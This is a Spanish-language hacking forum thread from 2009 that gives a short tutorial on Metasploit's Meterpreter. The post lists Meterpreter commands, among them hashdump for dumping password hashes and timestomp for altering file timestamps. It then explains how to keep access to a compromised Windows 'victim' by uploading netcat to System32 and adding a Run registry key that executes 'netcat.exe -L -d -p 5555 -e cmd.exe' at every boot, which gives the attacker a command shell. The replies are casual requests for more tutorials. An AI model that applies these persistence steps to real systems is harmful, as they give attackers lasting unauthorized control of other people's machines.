elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [Mini How-To] Usando Meterpreter
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Mini How-To] Usando Meterpreter  (Leído 19,877 veces)
kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
[Mini How-To] Usando Meterpreter
« en: 20 Noviembre 2009, 02:08 am »

Bueno, en este mini-manual, simplemente quería ilustrar el potencial de este magnífico plug-in que nos ofrece la suite MetaSploit Framework.

El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo mil y una funciones al alcance de un sólo comando, con lo que nos permite realizar los ataques haciendo algo menos de ruido.

Antes de ir a lo práctico, os quiero mostrar todas las posibilidades que nos ofrece esta genial herramienta:

Citar
Core Commands
=============

Command       Description
——-       ———–
?             Help menu
channel       Displays information about active channels
close         Closes a channel
exit          Terminate the meterpreter session
help          Help menu
interact      Interacts with a channel
irb           Drop into irb scripting mode
migrate       Migrate the server to another process
quit          Terminate the meterpreter session
read          Reads data from a channel
run           Executes a meterpreter script
use           Load a one or more meterpreter extensions
write         Writes data to a channel

Stdapi: File system Commands
============================

Command       Description
——-       ———–
cat           Read the contents of a file to the screen
cd            Change directory
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
pwd           Print working directory
rmdir         Remove directory
upload        Upload a file or directory

Stdapi: Networking Commands
===========================

Command       Description
——-       ———–
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing table

Stdapi: System Commands
=======================

Command       Description
——-       ———–
execute       Execute a command
getpid        Get the current process identifier
getuid        Get the user that the server is running as
kill          Terminate a process
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shutdown      Shuts down the remote computer
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command       Description
——-       ———–
idletime      Returns the number of seconds the remote user has been idle
uictl         Control some of the user interface components

Priv: Password database Commands
================================

Command       Description
——-       ———–
hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command       Description
——-       ———–
timestomp     Manipulate file MACE attributes

Bueno, como ejemplo básico del uso de meterpreter, vamos a suponer que hemos encontrado una vulnerabilidad en un sistema Windows, y que con ayuda del Metasploit le cascamos el exploit y le indicamos que como payload nos devuelva una sesión con el meterpreter a través de una conexión directa a la víctima.

Una vez que estamos situados en este escenario, nuestra tarea va a ser crear un backdoor un tanto rudimentario (pero efectivo), vamos a subirle un netcat a la víctima, y creando adecuadamente una entrada en el registro, vamos a hacer que cada vez que se arranque el sistema se ejecute netcat y espere conexiones en el puerto 5555, de forma que en el momento en el que nos conectemos, nos devuelva un cmd.

Bueno, pues manos a la obra!

Una vez que tenemos nuestro flamante metasploit corriendo...



Y como hemos indicado, se ha conseguido explotar alguna vulnerabilidad en el sistema remoto y obtener una sesión de meterpreter, procedemos a subir el ejecutable del netcat a la víctima, más concretamente a la carpeta System32:


Una vez que está subido, el siguiente paso será insertar una clave en el registro para que el programa se ejecute automáticamente al iniciar el sistema, y comprobamos que la clave se haya añadido :



la imagen es un poco grande y no se ve todo el comando de netcat, que sería:
Código:
netcat.exe -L -d -p 5555 -e cmd.exe


Finalmente, esperamos a que el Sistema de la víctima se reinicie para comprobar si ha funcionado el backdoor...



Voilà!! Parece que todo ha funcionado, y el Sistema al reiniciarse ejecuta sin problemas el netcat.
Para comprobarlo, otra captura más del registro del Pc Víctima visto desde dentro, donde comprobamos que efectivamente todo se ha añadido correctamente:




Como veis, esto es simplemente la punta del iceberg, es un ejemplo muy básico, pero creo que a la vez muy descriptivo de lo que se puede llegar a hacer y la facilidad con la cual hacerlo...

Os insto a que le echeis un ojo a este magnífico plug-in, y a su gran lista de funcionalidades, sin duda es una herramienta que nos hará la vida un poco más fácil!

saludos
« Última modificación: 20 Noviembre 2009, 02:12 am por kamsky » En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
anarquistadel89

Desconectado Desconectado

Mensajes: 158



Ver Perfil
Re: [Mini How-To] Usando Meterpreter
« Respuesta #1 en: 20 Noviembre 2009, 04:08 am »

 ;-)

Como se instala?
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: [Mini How-To] Usando Meterpreter
« Respuesta #2 en: 20 Noviembre 2009, 14:24 pm »

viene con el metasploit, es un payload más  :¬¬
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
shakuako

Desconectado Desconectado

Mensajes: 26


Ver Perfil
Re: [Mini How-To] Usando Meterpreter
« Respuesta #3 en: 20 Noviembre 2009, 20:00 pm »

anda kamsky comentanos paso a paso
En línea

peib0l
Wiki

Desconectado Desconectado

Mensajes: 3.493


freedom


Ver Perfil WWW
Re: [Mini How-To] Usando Meterpreter
« Respuesta #4 en: 20 Noviembre 2009, 20:08 pm »

para cuando haras un buen How To  de como usar metasploit ¿?!!!!!


gracias por estos aportes tio
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: [Mini How-To] Usando Meterpreter
« Respuesta #5 en: 20 Noviembre 2009, 20:13 pm »

gracias por el apoyo

bueno, tengo/tenemos otras cosas en mente para hacer, y el metasploit es un mundo, pero si que quizás me planté el ir soltando mini manuales con cosas especificas como esta   :silbar:

salu2
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
anarquistadel89

Desconectado Desconectado

Mensajes: 158



Ver Perfil
Re: [Mini How-To] Usando Meterpreter
« Respuesta #6 en: 20 Noviembre 2009, 20:31 pm »

viene con el metasploit, es un payload más  :¬¬

 :-X

No he usado nunca el metasploit, lo tengo x ahi perdido xD

+1 a lo de un tuto del ms  ;D
En línea

nacho87

Desconectado Desconectado

Mensajes: 71


Ver Perfil WWW
Re: [Mini How-To] Usando Meterpreter
« Respuesta #7 en: 21 Noviembre 2009, 12:04 pm »

Creo que ya lo habían comentado en el foro pero hay un tutorial de metasploit muy bueno por si os interesa. Está en inglés pero se entiende sin problemas.

http://www.offensive-security.com/metasploit-unleashed/

Que lo disfruteis!
En línea

anarquistadel89

Desconectado Desconectado

Mensajes: 158



Ver Perfil
Re: [Mini How-To] Usando Meterpreter
« Respuesta #8 en: 21 Noviembre 2009, 18:21 pm »

Creo que ya lo habían comentado en el foro pero hay un tutorial de metasploit muy bueno por si os interesa. Está en inglés pero se entiende sin problemas.

http://www.offensive-security.com/metasploit-unleashed/

Que lo disfruteis!

thx  ;-)
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Mini How-To] Usando Meterpreter
« Respuesta #9 en: 30 Julio 2010, 19:21 pm »

Siento re-abrir tema pero cual es el valor del argumento -v del comando set eval?
Saludos
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Comandos Meterpreter
Hacking
Stuxnet 1 6,545 Último mensaje 16 Noviembre 2012, 10:57 am
por el_snupy
Meterpreter webcam_list/snap
Hacking
ElP4nd4N3gro 1 3,071 Último mensaje 13 Febrero 2015, 13:09 pm
por ElP4nd4N3gro
Meterpreter
Seguridad
n3n3 2 3,407 Último mensaje 27 Febrero 2015, 07:38 am
por .:UND3R:.
backdoor con meterpreter
Hacking
d0r127 3 5,156 Último mensaje 9 Diciembre 2016, 00:13 am
por Gödric
No aparece meterpreter
Hacking
Dhamshoth2607 2 3,977 Último mensaje 13 Noviembre 2017, 03:59 am
por skorux
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines